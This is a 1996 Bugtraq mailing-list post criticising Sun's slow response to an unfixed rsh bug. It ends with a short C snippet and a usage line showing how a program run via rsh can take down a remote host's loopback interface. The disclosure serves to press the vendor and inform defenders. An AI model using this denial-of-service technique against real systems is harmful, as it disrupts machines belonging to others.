[3833] in bugtraq
Slow vendor response
daemon@ATHENA.MIT.EDU (Alan Cox)
Sun Dec 22 04:18:21 1996
Date: Fri, 20 Dec 1996 19:44:15 +0000
Reply-To: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
X-To: deraadt@cvs.openbsd.org
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199612200015.RAA08321@cvs.openbsd.org> from "Theo de Raadt" at
Dec 19, 96 05:15:28 pm
> bugtraq can provide. (Not that the vendor contact seems to matter
> much, I note Sun is still investigating the ping problem that everyone
> else has fixed.)
IMHO thats just Sunksoft. The rsh bug isnt fixed yet. Now thats almost a year
old. We passed it to folks in Sun. Later I brought it up in usenet and
Mark Graff of sun asked me about it. Can't see any fix reports for it.
Lets see some response folks.
[This is the
ifr.ifr_flags=0;
strcpy(ifr.ifr_name,"lo");
ioctl(0, SIOCSIFFLAGS,&ifr);
run with
rsh remotebox program
and down goes their loopback. I've not played with this and ssh. I think
ssh is safe because you never get the original socket handle passed to
a user program.]
Alan
